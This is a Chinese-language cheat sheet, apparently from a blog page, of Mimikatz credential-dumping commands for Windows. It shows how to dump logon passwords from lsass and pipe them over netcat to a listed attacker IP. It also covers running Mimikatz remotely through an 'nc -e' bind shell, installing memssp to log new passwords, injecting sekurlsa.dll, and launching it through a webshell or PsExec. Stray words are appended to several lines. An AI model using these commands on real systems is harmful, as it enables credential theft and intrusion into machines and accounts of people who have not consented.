Mimikatz 使用Tips

1.记录 Mimikatz输出: 
C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.将输出导入到本地文件: 
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.将输出传输到远程机器: 
Attacker执行: 
E:\>nc -lvp 4444
Victim执行: 
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
192.168.52.1 为Attacker IP 

4.经过nc远程执行Mimikatz: 
Victim执行: 
C:\>nc -lvp 443
Attacker执行: 
E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 为Victim IPweb

若管理员有每过几天就改密码的习惯,可是mimikatz抓取到的密码都是老密码shell

用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的状况下windows

能够使用如下方法尝试解决sass

privilege::debug
misc::memssp

记录的结果在c:\windows\system32\mimilsa.log
每次验证都会记录  如 锁屏 等  重启失效
url

出现如上问题是由于管理一直没注销过,都是直接断开链接,lsass进程里面还吃存放的老的。debug

也能够直接logoff,可是这样会很明显。code

 

文件
mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)
 
本机终端
绝对路径\mimikatz.exe
privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit
 
 
webshell
绝对路径\mimikatz.exe < 绝对路径\c.txt > 绝对路径\userpass.txt
----------c.txt----------
privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit
-------------------------
 
 
远程终端
psexec.exe -s cmd.exe
绝对路径\mimikatz.exe
privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit
相关文章
相关标签/搜索